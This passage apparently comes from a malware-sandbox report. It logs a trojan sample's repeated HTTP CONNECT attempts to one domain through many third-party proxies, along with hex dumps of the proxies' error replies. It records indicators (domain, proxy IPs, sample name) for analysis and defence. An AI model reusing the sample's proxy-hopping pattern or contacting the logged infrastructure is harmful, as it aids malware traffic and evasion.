                                                                                Data Ascii: =9:'G%P%?.DOWNGRD0000*H03110/U(heygirlisheeverythingyouwantedinaman.com0240223130304Z260222130304Z03110/U(heygirlisheeverythingyouwantedinaman.c
                                                                                Feb 23, 2024 14:28:23.388637066 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 82 d2 38 c6 de 0f c8 ff 03 70 38 dd 31 e6 cb 82 b9 25 1e 78 1c 7a d3 a2 1a 19 e7 66 26 de aa 60 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 aa 7a 32 dd a9 85 e7 dc e4 35 e3 8b 1e 0c 8c 19 21 f1 53 92 cf
                                                                                Data Ascii: %! 8p81%xzf&`(z25!S%by`<
                                                                                Feb 23, 2024 14:28:23.550440073 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 fa 01 94 d1 45 5f 08 3a fb 16 10 f9 e9 4d 34 0f 66 5e 9a 09 cc d8 4f e8 c0 ec cb 6e 34 c9 a4 33 56 3b c5 0c e8 ef 70 b3
                                                                                Data Ascii: (E_:M4f^On43V;p


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                109192.168.2.850266101.231.64.8984435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.054858923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                110192.168.2.850392185.38.111.180805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.056572914 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.243664026 CET75INHTTP/1.1 200 OK
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Length: 0
                                                                                Feb 23, 2024 14:28:23.432044983 CET103INHTTP/1.1 400 Bad Request
                                                                                Content-Type: text/plain; charset=utf-8
                                                                                Connection: close
                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                Data Ascii: 400 Bad Request


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                111192.168.2.850429198.105.111.8667645828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.059433937 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.317634106 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                Proxy-Connection: close
                                                                                X-Webshare-Error: 407
                                                                                X-Webshare-Reason: invalidpassword
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Length: 121
                                                                                Content-Type: text/plain; charset=utf-8
                                                                                Connection: close
                                                                                Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                112192.168.2.84976168.1.210.18941455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.077291012 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                113192.168.2.85046650.63.13.3116735828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.077393055 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.491605043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.929142952 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.788553953 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.694927931 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.491885900 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.382462025 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.992018938 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.882713079 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                114192.168.2.850486166.62.53.45568625828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.087145090 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.522846937 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.991637945 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.991821051 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.882651091 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.847687960 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.781599045 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.492043018 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.898828030 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                115192.168.2.850573104.20.125.124805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.087467909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.175554991 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                116192.168.2.850576104.24.15.158805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.088687897 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.175721884 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                117192.168.2.850578185.162.228.48805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.093170881 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.180999041 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                118192.168.2.850579104.25.135.170805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.093296051 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.181169033 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                119192.168.2.85035243.153.133.208156735828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.104018927 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                120192.168.2.85049294.142.137.20397415828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.107039928 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.308450937 CET132INHTTP/1.1 503 Too many open connections
                                                                                Content-Type: text/plain
                                                                                Connection: close
                                                                                Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a
                                                                                Data Ascii: Maximum number of open connections reached.


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                121192.168.2.850490141.94.174.6397965828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.110265017 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.569729090 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                122192.168.2.85031558.234.116.197805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.111963987 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.401377916 CET166INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                123192.168.2.850463142.54.228.19341455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.114816904 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                124192.168.2.850510199.188.92.4780005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.118237972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.278937101 CET1286INHTTP/1.1 407 Proxy Authentication Required
                                                                                Server: squid/4.15
                                                                                Mime-Version: 1.0
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html;charset=utf-8
                                                                                Content-Length: 3594
                                                                                X-Squid-Error: ERR_CACHE_ACCESS_DENIED 0
                                                                                Vary: Accept-Language
                                                                                Content-Language: en
                                                                                Proxy-Authenticate: Basic realm="SC-Proxy"
                                                                                X-Cache: MISS from out.domain.net
                                                                                X-Cache-Lookup: NONE from out.domain.net:8000
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 43 61 63 68 65 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2021 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Cache Access Denied</title><style type="text/css">... /* * Copyright (C) 1996-2021 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                125192.168.2.850509141.94.174.6418665828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.123954058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                126192.168.2.850468176.98.81.8580805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.132503986 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                127192.168.2.849969111.16.50.1290025828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.139799118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.041008949 CET311INHTTP/1.1 400 Bad Request
                                                                                Server: nginx
                                                                                Date: Fri, 23 Feb 2024 13:28:24 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 166
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                128192.168.2.850545162.214.162.18092515828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.153261900 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.616600990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.147891998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.195161104 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.393054008 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.491946936 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
